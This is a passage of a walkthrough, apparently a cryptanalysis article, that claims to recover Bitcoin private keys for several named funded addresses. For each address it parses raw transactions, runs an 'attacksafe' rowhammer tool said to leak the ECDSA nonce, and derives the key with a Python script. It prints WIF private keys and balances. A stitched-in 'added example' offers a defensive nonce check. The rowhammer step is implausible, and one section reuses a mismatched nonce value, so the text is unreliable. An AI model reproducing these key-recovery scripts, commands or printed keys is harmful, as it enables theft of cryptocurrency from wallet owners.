K = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383
Now, knowing the secret key, we can get the private key of the Bitcoin wallet: 18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
Let's use the Python script: calculate.py
> > > Get the private key
Let's open the code and add all the signature values K, R, S, Z
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    # Extended Euclidean algorithm: returns (gcd, x, y) with aa*x + bb*y == gcd
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    # Modular inverse of a modulo m
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m

N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x093bf9a5eb46ddeff6bcf94a326d00f89bc0ce6cbada4c5897758550eae10383
R = 0x682e6b2b855d9ca3e9e88a1ecf44cfe82461560c6c6db54c0c894e9c3e8b1e88
S = 0x052dd955d1521081a2e48b1830ee17e3c3f75eaf5fdc9072905914f5872155b9
Z = 0x395e27708f075827fc7b179382a2a5e13c7649a046a89f2937bc5754349cc05d
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script will calculate the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Let's run the script:
python3 calculate.py

PrivKey = 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba
Let's open bitaddress and check:
ADDR: 18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
WIF: L1jMLZYkKr2YoTLH9xWXS9jPMgeasnTxWmGrHBK9aMCW9ahsNDzP
HEX: 86990adfdb019df305b4d38a963c9f46a1fbeac332285d122b0e2f888de31fba

The private key is found!

www.blockchain.com/btc/address/18hhdfynnojmiMmBMsrkXNFWketq4mmDHB
BALANCE: $ 708.99
№3
Through detailed cryptanalysis, we also found a critical vulnerability in the Bitcoin address:
14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP


Prepare RawTX for the attack
14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP

RawTX = 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Now we need to get all the R, S, Z values from all vulnerable transactions
Let's use the breakECDSA.py script
python2 breakECDSA.py 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17
To obtain the secret key from the vulnerable ECDSA signature transaction, let's add the RawTX data to a text document and save it as the file RawTX.txt
010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Launch -tool rowhammer_attack using the "ATTACKSAFE SOFTWARE"
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We launched this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt
Now, to see the successful result, open the file SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
RawTX = 010000000188e589b8eed21964cb26cbdf6c396d00eeafa9e3647c9127cbdb23140952aa5b2d0000006b483045022100ddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab02200d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc88050121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
SecretKey is a value in HEX format; this is our secret key "K" (NONCE):
K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
Let's check it with the Python script point2gen.py
Let's use the ECPy elliptic curve library:
Now let's run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe

(0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab , 0x4dd4a6ea5041635a29cafaeb019dce1848cab62c5b638dd235c3177f361f0911)
EC (secp256k1)
Check the coordinates of the point against the signature value R
R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17
R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
point2gen = (0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab , 0x4dd4a6ea5041635a29cafaeb019dce1848cab62c5b638dd235c3177f361f0911)
ALL CORRECT!
K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
Now, knowing the secret key, we can get the private key of the Bitcoin wallet: 14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
Let's use the Python script: calculate.py
> > > Get the private key
Let's open the code and add all the signature values K, R, S, Z
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    # Extended Euclidean algorithm: returns (gcd, x, y) with aa*x + bb*y == gcd
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    # Modular inverse of a modulo m
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m

N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
R = 0xddf8c20bb701221daa1a16b69d448bd9582a9051889c0ba71d73930b61876bab
S = 0x0d66649db3f3a1b7c28984f4d08d41496ffc8488b6e35e4f2b4abdd6bdfc8805
Z = 0xf01bdd08bc326304be4dece37d9b9069959f0f8e20dbd14b840849271042ab17
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script will calculate the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Let's run the script:
python3 calculate.py

PrivKey = cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b
Let's open bitaddress and check:
ADDR: 14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
WIF: L47qg9KCcGYw1WkVKGA6EH6mAdMoD5WwXCT4Gyn8UxLGPbZ14AUz
HEX: cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b

The private key is found!

www.blockchain.com/btc/address/14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
BALANCE: $ 698.45
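The potential threat of losing BTC coins lies in a critical vulnerability of Bitcoin blockchain transactions, so we strongly recommend that everyone always update their software and use only verified devices.
Through detailed cryptanalysis, we also found a critical vulnerability for the same Bitcoin address in TXID: 7de3c41e439bbab837602019e17611d6fe9d245bcb1f182add148fc35fc42e8f
Prepare RawTX for the attack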
14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP

RawTX = 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Now we need to get all the R, S, Z values from all vulnerable transactions
Let's use the breakECDSA.py script
python2 breakECDSA.py 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8
To obtain the secret key from the vulnerable ECDSA signature transaction, let's add the RawTX data to a text document and save it as the file RawTX.txt
0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Launch -tool rowhammer_attack using the "ATTACKSAFE SOFTWARE"
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We launched this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt
Now, to see the successful result, open the file SecretKey.txt
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c
RawTX = 0100000001e4c6502d4648cd1ae5f2783fe4e8ba449257f0a38b0f8b061ec1cd53e4ba2ade040000006a47304402200a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf781902204eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e390121031702d9ec2144df3030e65465bb96d651ea18c56c90215f4835d86e03d797091affffffff01a8020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
SecretKey is a value in HEX format; this is our secret key "K" (NONCE):
K = 0x786a67462e7cfaee1fb5b583518d3f47d750dbf34e9a4434625232cb05cb7efe
Let's check it with the Python script point2gen.py
Let's use the ECPy elliptic curve library:
Now let's run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c

(0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819 , 0x21ef3da06220ca412f63e331d3ad52effee2b6afe4bcbba76380f30abbf91f5b)
EC (secp256k1)
Check the coordinates of the point against the signature value R
R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8
R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
point2gen = (0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819 , 0x21ef3da06220ca412f63e331d3ad52effee2b6afe4bcbba76380f30abbf91f5b)
ALL CORRECT!
K = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c
Now, knowing the secret key, we can get the private key of the Bitcoin wallet: 14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
Let's use the Python script: calculate.py
> > > Get the private key
Let's open the code and add all the signature values K, R, S, Z
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    # Extended Euclidean algorithm: returns (gcd, x, y) with aa*x + bb*y == gcd
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    # Modular inverse of a modulo m
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m

N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0x326428d5b16a180127f67d9dbce5a500e572bf8ff5d7a8840b9704f8bea8fd9c
R = 0x0a5a38731e8947d567cd82302b8a3a9546215f044ca98b89ea162334bebf7819
S = 0x4eb5aae65c917b18ae6af2b2449bb0ec8c8af4e02c0f68aabba7f509b06c5e39
Z = 0xade80ed6e0d32f4cf2ad36e7f2b28e3f0d421de70310d8726f7dd8a2580936a8
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script will calculate the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Let's run the script:
python3 calculate.py

PrivKey = cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b
Let's open bitaddress and check:
ADDR: 14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
WIF: L47qg9KCcGYw1WkVKGA6EH6mAdMoD5WwXCT4Gyn8UxLGPbZ14AUz
HEX: cdd7729ab894ba334e9a9b55c6bdb8c7e5869c80339ca6bb0ae23faee6af550b

The private key is found!

www.blockchain.com/btc/address/14jUzNgdAboyaUaWNxbDJYYAKwHSwwj6sP
BALANCE: $ 698.45
№4
Through detailed cryptanalysis, we also found a critical vulnerability in the Bitcoin address:
17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc


Prepare RawTX for the attack
17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc

RawTX = 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Now we need to get all the R, S, Z values from all vulnerable transactions
Let's use the breakECDSA.py script
python2 breakECDSA.py 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000

R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e
To obtain the secret key from the vulnerable ECDSA-signed transaction, add the RawTX data to a text document and save it as the file RawTX.txt:
010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
Run -tool rowhammer_attack using the “ATTACKSAFE SOFTWARE”:
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We ran this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt.
To see the result, open the file SecretKey.txt:
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
RawTX = 010000000161d00e5c5d90528fb69e727a481638d109b011c0944e17e21b4a8b06de7086ba1400000069463043021f057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb702200707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd0121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff01d0020000000000001976a914e94a23147d57674a7b817197be14877853590e6e88ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
The SecretKey value in HEX format is our secret key "K" (NONCE):
K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
Let's verify this with the Python script point2gen.py, which uses the ECPy elliptic curve library.
Run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820

(0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7 , 0xce504e53221559f480af279f313f5f4913f6b8c317561e570290e3b1b6da0a94)
EC (secp256k1)
Check the coordinates of the point against the signature value R:
R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e
R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
point2gen = (0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7 , 0xce504e53221559f480af279f313f5f4913f6b8c317561e570290e3b1b6da0a94)
ALL CORRECT!
K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
Now that we know the secret key, we can obtain the private key of the Bitcoin wallet: 17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
Let's use the Python script calculate.py to get the private key.
Open the code and add all the signature values K, R, S, Z:
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")
def extended_gcd(aa, bb):
    # Extended Euclid: returns (g, x, y) with aa*x + bb*y == g
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
    # Modular inverse of a modulo m; fails when gcd(a, m) != 1
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
K = 0xe83de16640c70e103fd24d2e10535896054861ba444f659ea17d953490821820
R = 0x00057a78c3377aa63c69a6b8f85f86ba5ce433198bba2a3f91c64da614952fb7
S = 0x0707ef040813d2693a50dd7458bbf07c07ff28e2233a3adeb81120898d7ee4cd
Z = 0x6b260e8163bb2a68f5dea232134c0f2ceefe242564dba90632b72b10e0a3a91e
print (h((((S * K) - Z) * modinv(R,N)) % N))
The script computes the private key using the formula:
Privkey = ((((S * K) - Z) * modinv(R,N)) % N)
Run the script:
python3 calculate.py

PrivKey = e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf
Open bitaddress and check:
ADDR: 17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
WIF: L54WQgCucvc7HCQvYSKnKgiqMUXXXvPxEYZbpxFWTeqQQTuAsqhH
HEX: e9f6fc4dea68373f7e91348a23086d406621c1af6b7c0f085fb3096f5ae6b5cf

Private key found!

www.blockchain.com/btc/address/17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
BALANCE: $ 679.53
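The potential threat of losing BTC coins lies in a critical vulnerability in the Bitcoin blockchain transaction, so we strongly recommend that everyone always update their software and use only verified devices.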
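The two checks used in this walkthrough, written as the test a wallet owner would run to decide whether a suspected nonce leak is real and the key must be rotated. This is an added example, not code from the original article or the CryptoDeepTools repository. The key, nonce and hash are constructed sample values, the function names are hypothetical, and the plain-Python curve arithmetic is a stand-in for ECPy.

```python
# Added example: self-contained secp256k1 arithmetic (stand-in for ECPy).
P = 2**256 - 2**32 - 977          # field prime
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141  # group order
G = (0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798,
     0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8)

def inv(a, m):
    """Modular inverse for a prime modulus m (Fermat's little theorem)."""
    return pow(a % m, m - 2, m)

def add(p, q):
    """Add two affine points; None stands for the point at infinity."""
    if p is None:
        return q
    if q is None:
        return p
    (x1, y1), (x2, y2) = p, q
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p == q:
        lam = 3 * x1 * x1 * inv(2 * y1, P) % P
    else:
        lam = (y2 - y1) * inv(x2 - x1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def mul(k, p=G):
    """Double-and-add scalar multiplication (not constant time, demo only)."""
    acc = None
    while k:
        if k & 1:
            acc = add(acc, p)
        p = add(p, p)
        k >>= 1
    return acc

def sign(d, k, z):
    """Textbook ECDSA: r = (k*G).x mod n, s = k^-1 * (z + r*d) mod n."""
    r = mul(k)[0] % N
    return r, inv(k, N) * (z + r * d) % N

def nonce_matches(k, r):
    """point2gen-style check: the x-coordinate of k*G must equal R."""
    return 0 < k < N and mul(k)[0] % N == r

def key_from_nonce(k, r, s, z):
    """Rearranging s = k^-1 * (z + r*d) gives d = (s*k - z) * r^-1 mod n."""
    return (s * k - z) * inv(r, N) % N

def nonce_exposes_key(pubkey, k, r, s, z):
    """True when the suspected nonce really yields the key behind pubkey."""
    if not nonce_matches(k, r):
        return False  # the claimed nonce does not belong to this signature
    # A low-S normalised signature (s -> n - s) corresponds to nonce n - k.
    return any(mul(key_from_nonce(c, r, s, z)) == pubkey for c in (k, N - k))

# Constructed sample values (not taken from any real wallet or transaction).
D = 0x1f2e3d4c5b6a79880123456789abcdef0fedcba9876543211122334455667788
K = 0x0a1b2c3d4e5f60718293a4b5c6d7e8f900112233445566778899aabbccddeeff
Z = 0x3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d5e6f708192a3b4c5d6e7f8091a2b

if __name__ == "__main__":
    r, s = sign(D, K, Z)
    print("nonce fits signature:", nonce_matches(K, r))
    print("key exposed, rotate it:", nonce_exposes_key(mul(D), K, r, s, Z))
```

A single confirmed nonce is enough to expose the key, so a positive result means moving funds to a fresh key rather than patching the signer alone.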
Through detailed cryptanalysis, we also found a critical vulnerability for the same Bitcoin address in TXID 17ea9403f628a1810ffa70858dd5411c455fbdc1fd8c7e2048c5e5ae5d2ac839:
Prepare the RawTX for the attack
17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc

RawTX = 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000
Now we need to get all R, S, Z values from all vulnerable transactions.
Let's use the breakECDSA.py script:
python2 breakECDSA.py 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000

R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8
To obtain the secret key from the vulnerable ECDSA-signed transaction, add the RawTX data to a text document and save it as the file RawTX.txt:
010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000
Run -tool rowhammer_attack using the “ATTACKSAFE SOFTWARE”:
./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt

We ran this attack with -tool rowhammer_attack and saved the result to the file SecretKey.txt.
To see the result, open the file SecretKey.txt:
cat SecretKey.txt

Deployments ECDSA:
SecretKey = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
RawTX = 010000000178dc582ecec1c896cefa5c8207ef549ed7e052f386328530eec78869764bbaa21f0000006b483045022100cb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c36802205b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe87200121027625d44b04d7760766b280d683d3495a0532fd8e931e48cc546bf794286a9defffffffff013a020000000000001976a91464c2de8847e1ab5f767ae5ab8253d7522572ddf888ac00000000
We see the inscription "Deployments ECDSA", which means there is a critical vulnerability in the Bitcoin blockchain transaction.
The SecretKey value in HEX format is our secret key "K" (NONCE):
K = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
Let's verify this with the Python script point2gen.py, which uses the ECPy elliptic curve library.
Run the script, specifying the secret key "K" (NONCE):
python3 point2gen.py 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a

(0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368 , 0x37b895600595d773ef80780fadfb81f34ab997aafdee272e1baf1b199df853a3)
EC (secp256k1)
Check the coordinates of the point against the signature value R:
R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
S = 0x5b4f85e04379ca7fc4d48bbf4ed5a204eba9459bcfe042c4fb10f13c76fe8720
Z = 0x5a6c8e71ff1d29ebf721320d373808f66ede9303e09e3715b3e85ce57b92b7c8
R = 0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368
point2gen = (0xcb620734c986b2f5ef6d3dbaa72baec6ceb153590553d15c28f57fc809e0c368 , 0x37b895600595d773ef80780fadfb81f34ab997aafdee272e1baf1b199df853a3)
ALL CORRECT!
K = 0x5cdc6820f6336951f2d9f55b544ed2337804ddaa38249f53e7fc7b176ae67a2a
Now that we know the secret key, we can obtain the private key of the Bitcoin wallet: 17xFf85Y8YGsRsgSjCN4KfBKXTjpSnDBxc
Let's use the Python script calculate.py to get the private key.
Open the code and add all the signature values K, R, S, Z:
def h(n):
    # Hex string without the "0x" prefix
    return hex(n).replace("0x","")
def extended_gcd(aa, bb):
    # Extended Euclid: returns (g, x, y) with aa*x + bb*y == g
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
    # Modular inverse of a modulo m; fails when gcd(a, m) != 1
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
